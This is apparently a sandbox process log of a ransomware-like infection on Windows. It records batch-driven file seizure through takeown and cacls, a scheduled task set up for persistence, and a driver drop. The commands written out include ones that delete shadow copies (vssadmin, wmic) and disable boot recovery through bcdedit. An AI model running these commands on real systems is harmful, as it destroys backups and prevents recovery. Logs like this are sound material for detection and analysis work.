  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:2720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:2944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  PID:3988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:4072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:4936
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:4852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:5076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:5040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:4272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:4360
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  PID:4164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:4340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""
  2⤵
  PID:3364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui""
  2⤵
  PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui""
  2⤵
  PID:3772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui""
  2⤵
  PID:3972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui""
  2⤵
  PID:3464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""
  2⤵
  PID:3764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:2268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:3664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:3648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui""
  2⤵
  PID:2504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:3376
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:2224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:1756
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:2192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:2156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:4976
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:2276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:4856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:4812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:5044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:4408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:3744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:4280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:4284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:4320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:3496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  PID:1940
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""
  2⤵
  PID:2412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:3000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""
  2⤵
  PID:3788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""
  2⤵
  PID:1536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui""
  2⤵
  PID:3308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui""
  2⤵
  PID:4000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui""
  2⤵
  PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  PID:984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""
  2⤵
  PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:2724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:2632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:3904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:3968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:1160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:4884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:3044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:3060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:3536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:4236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:4392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:4692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:3108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:3864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:3116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""
  2⤵
  PID:4612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui""
  2⤵
  PID:944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui""
  2⤵
  PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui""
  2⤵
  PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui""
  2⤵
  PID:4016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""
  2⤵
  PID:3124
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui""
  2⤵
  PID:4608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:2468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:4580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui""
  2⤵
  PID:2768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:2984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:2540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:3140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:3048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:5024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:4924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:5116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:292

C:\Windows\SysWOW64\wscript.exe
wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\uxBbuLmF.vbs"
1⤵
PID:324
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\u3kKsgfY.bat" /sc minute /mo 5 /RL HIGHEST /F
  2⤵
  PID:2268
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\u3kKsgfY.bat" /sc minute /mo 5 /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:1144
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "Seyes.jtp" -nobanner
      4⤵
      PID:536
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
  2⤵
  PID:3672
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:4984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
  2⤵
  PID:4204

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy64.exe
3KvhBUKy.exe -accepteula "StandardBusiness.pdf" -nobanner
1⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /I /tn DSHCA
1⤵
PID:4596
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:5116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "wab.exe" -nobanner
  2⤵
  PID:3672
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Mail\wab.exe"
  2⤵
  PID:2844
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
  2⤵
  PID:4848

C:\Windows\system32\taskeng.exe
taskeng.exe {3291209C-224A-48E3-9FF0-2DC0E7345403} S-1-5-21-3470981204-343661084-3367201002-1000:GLTGRJAG\Admin:Interactive:[1]
1⤵
PID:3532
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\u3kKsgfY.bat"
  2⤵
  PID:4896
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:4516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    PID:4616
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4296
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:4632
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4628
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:4732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:3332
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui"
      4⤵
      PID:2188
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui" /E /G Admin:F /C
      4⤵
      PID:4532
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4268

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
1⤵
PID:492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ENUtxt.pdf" -nobanner
1⤵
PID:3500

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
1⤵
PID:412

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4100

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
1⤵
PID:1152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
1⤵
PID:1540

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
1⤵
PID:1684

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
1⤵
PID:4084

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
1⤵
PID:2628

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
1⤵
- Modifies file permissions
